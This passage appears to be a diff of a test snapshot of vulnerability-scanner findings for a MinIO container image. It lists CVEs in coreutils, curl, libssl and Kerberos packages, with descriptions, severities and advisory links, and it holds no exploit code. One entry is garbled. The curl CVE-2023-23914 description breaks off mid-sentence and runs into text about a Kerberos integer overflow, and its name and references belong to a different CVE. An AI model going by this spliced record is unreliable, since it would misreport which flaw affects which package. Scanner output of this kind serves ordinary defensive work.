"attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-2781", + "installedVersion": "8.32-4+b1", + "packageName": "coreutils", + "references": [ + "http://seclists.org/oss-sec/2016/q1/452", + "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "https://access.redhat.com/security/cve/CVE-2016-2781", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lore.kernel.org/patchwork/patch/793178/", + "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "https://www.cve.org/CVERecord?id=CVE-2016-2781", + ], + }, + "category": "Vulnerability", + "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "coreutils: Non-privileged session can escape to the parent session in chroot", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "value": "https://avd.aquasec.com/nvd/cve-2016-2781", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "value": "http://seclists.org/oss-sec/2016/q1/452", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", + "value": "https://access.redhat.com/security/cve/CVE-2016-2781", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5502-1", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "value": "https://lore.kernel.org/patchwork/patch/793178/", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5343", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220705.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4304", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", + "id": "CVE-2017-18018", + "installedVersion": "8.32-4+b1", + "packageName": "coreutils", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2022-4304", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", - "https://linux.oracle.com/cve/CVE-2022-4304.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", - "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4304", - "https://www.openssl.org/news/secadv/20230207.txt", + "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "https://access.redhat.com/security/cve/CVE-2017-18018", + "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "https://www.cve.org/CVERecord?id=CVE-2017-18018", ], }, "category": "Vulnerability", - "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", + "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "timing attack in RSA Decryption implementation", + "name": "coreutils: race condition vulnerability in chown and chgrp", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4304", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4304", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://avd.aquasec.com/nvd/cve-2017-18018", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://access.redhat.com/security/cve/CVE-2017-18018", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "7.74.0-1.3+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-32221", + "installedVersion": "7.74.0-1.3+deb11u2", + "packageName": "curl", + "references": [ + "http://seclists.org/fulldisclosure/2023/Jan/19", + "http://seclists.org/fulldisclosure/2023/Jan/20", + "http://www.openwall.com/lists/oss-security/2023/05/17/4", + "https://access.redhat.com/errata/RHSA-2023:0333", + "https://access.redhat.com/security/cve/CVE-2022-32221", + "https://bugzilla.redhat.com/2135411", + "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", + "https://curl.se/docs/CVE-2022-32221.html", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", + "https://errata.almalinux.org/9/ALSA-2023-0333.html", + "https://errata.rockylinux.org/RLSA-2023:0333", + "https://hackerone.com/reports/1704017", + "https://linux.oracle.com/cve/CVE-2022-32221.html", + "https://linux.oracle.com/errata/ELSA-2023-0333.html", + "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", + "https://security.gentoo.org/glsa/202212-01", + "https://security.netapp.com/advisory/ntap-20230110-0006/", + "https://security.netapp.com/advisory/ntap-20230208-0002/", + "https://support.apple.com/kb/HT213604", + "https://support.apple.com/kb/HT213605", + "https://ubuntu.com/security/notices/USN-5702-1", + "https://ubuntu.com/security/notices/USN-5702-2", + "https://ubuntu.com/security/notices/USN-5823-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32221", + "https://www.debian.org/security/2023/dsa-5330", + ], + }, + "category": "Vulnerability", + "description": "When doing HTTP(S) transfers, libcurl might erroneously use the read callback (\`CURLOPT_READFUNCTION\`) to ask for data to send, even when the \`CURLOPT_POSTFIELDS\` option has been set, if the same handle previously was used to issue a \`PUT\` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent \`POST\` request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "POST following PUT confusion", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://avd.aquasec.com/nvd/cve-2022-32221", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "http://seclists.org/fulldisclosure/2023/Jan/19", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "http://seclists.org/fulldisclosure/2023/Jan/20", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "http://www.openwall.com/lists/oss-security/2023/05/17/4", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://access.redhat.com/errata/RHSA-2023:0333", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://access.redhat.com/security/cve/CVE-2022-32221", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://bugzilla.redhat.com/2135411", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://curl.se/docs/CVE-2022-32221.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://errata.almalinux.org/9/ALSA-2023-0333.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://errata.rockylinux.org/RLSA-2023:0333", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://hackerone.com/reports/1704017", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://linux.oracle.com/cve/CVE-2022-32221.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://linux.oracle.com/errata/ELSA-2023-0333.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://security.gentoo.org/glsa/202212-01", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://security.netapp.com/advisory/ntap-20230110-0006/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://security.netapp.com/advisory/ntap-20230208-0002/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://support.apple.com/kb/HT213604", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://support.apple.com/kb/HT213605", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://ubuntu.com/security/notices/USN-5702-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://ubuntu.com/security/notices/USN-5702-2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://ubuntu.com/security/notices/USN-5823-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32221", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://www.debian.org/security/2023/dsa-5330", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-23914", + "installedVersion": "7.74.0-1.3+deb11u2", + "packageName": "curl", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-23914", + "https://curl.se/docs/CVE-2023-23914.html", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23914", + "https://hackerone.com/reports/1813864", + "https://nvd.nist.gov/vuln/detail/CVE-2023-23914", + "https://security.netapp.com/advisory/ntap-20230309-0006/", + "https://ubuntu.com/security/notices/USN-5891-1", + "https://www.cve.org/CVERecord?id=CVE-2023-23914", + ], + }, + "category": "Vulnerability", + "description": "A cleartext transmission of sensitive information vulnerability exists in curl n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libk5crypto3", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", + ], + }, + "category": "Vulnerability", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "integer overflow vulnerabilities in PAC parsing", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41721", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libk5crypto3", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41721", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", - "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", - "https://go.dev/cl/447396", - "https://go.dev/issue/56352", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", - "https://pkg.go.dev/vuln/GO-2023-1495", - "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "request smuggling", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41721", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41721", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://go.dev/cl/447396", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://go.dev/issue/56352", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1495", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5-3", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + 